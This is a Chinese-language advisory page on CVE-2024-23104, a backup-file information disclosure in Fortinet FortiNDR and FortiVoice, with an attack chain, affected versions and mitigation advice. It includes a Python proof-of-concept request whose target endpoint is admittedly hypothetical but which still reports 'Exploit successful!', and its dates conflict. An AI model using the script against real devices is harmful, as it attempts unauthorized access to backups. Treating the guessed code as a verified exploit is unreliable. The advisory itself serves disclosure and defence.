IPBUF安全漏洞报告
English
CVE-2024-23104 CVSS 5.4 中危

CVE-2024-23104 Fortinet敏感信息泄露漏洞

披露日期: 2026-04-14
来源: [email protected]

漏洞信息

漏洞编号
CVE-2024-23104
漏洞类型
敏感信息泄露
CVSS评分
5.4 中危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
Fortinet FortiNDR, FortiVoice

相关标签

信息泄露FortinetFortiNDRFortiVoice权限绕过CVE-2024-23104

漏洞概述

Fortinet FortiNDR 和 FortiVoice 存在敏感信息泄露漏洞。由于系统维护权限校验不当,拥有只读权限的远程攻击者可通过构造特制的 HTTP 请求访问备份信息,导致敏感数据泄露。

技术细节

该漏洞源于 Fortinet FortiNDR 和 FortiVoice 在处理备份相关接口时的权限控制逻辑缺陷。系统未对具有“系统维护”只读权限的用户进行严格的操作限制,允许其通过精心构造的 HTTP 请求访问原本受限的备份文件。攻击者利用此漏洞可绕过访问控制策略,直接下载或查看包含敏感配置的备份数据,造成信息泄露风险。

攻击链分析

STEP 1
侦察
攻击者识别目标为运行受影响版本的 Fortinet FortiNDR 或 FortiVoice 设备。
STEP 2
获取访问权限
攻击者使用低权限账户(具有系统维护只读权限)登录设备。
STEP 3
漏洞利用
攻击者利用该低权限账户,向系统发送精心构造的 HTTP 请求,请求访问备份文件或接口。
STEP 4
数据泄露
系统返回原本受限的备份信息,攻击者成功获取敏感数据。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Exploit Title: Fortinet FortiNDR/FortiVoice Backup Information Disclosure # Date: 2024-04-14 # Exploit Author: Analyst # Vendor Homepage: https://www.fortinet.com/ # Version: FortiNDR 7.0-7.6, FortiVoice 7.0-7.0.1 # Target URL target_url = "https://<target_ip>/api/backup" # Hypothetical endpoint based on description # Headers (Authentication token required) headers = { "Authorization": "Bearer <read_only_token>", "User-Agent": "Mozilla/5.0" } try: # Send crafted HTTP request to access backup info response = requests.get(target_url, headers=headers, verify=False) if response.status_code == 200: print("[+] Exploit successful! Backup data accessed.") print(response.text) else: print(f"[-] Exploit failed. Status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

影响范围

FortiNDR 7.6.0
FortiNDR 7.4.0 - 7.4.8
FortiNDR 7.2 (所有版本)
FortiNDR 7.1 (所有版本)
FortiNDR 7.0 (所有版本)
FortiVoice 7.0.0 - 7.0.1

防御指南

临时缓解措施
建议立即应用厂商提供的补丁或升级至修复版本。若无法立即升级,应严格限制具有系统维护只读权限的账户来源,并监控设备日志中是否存在异常的备份文件访问请求。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表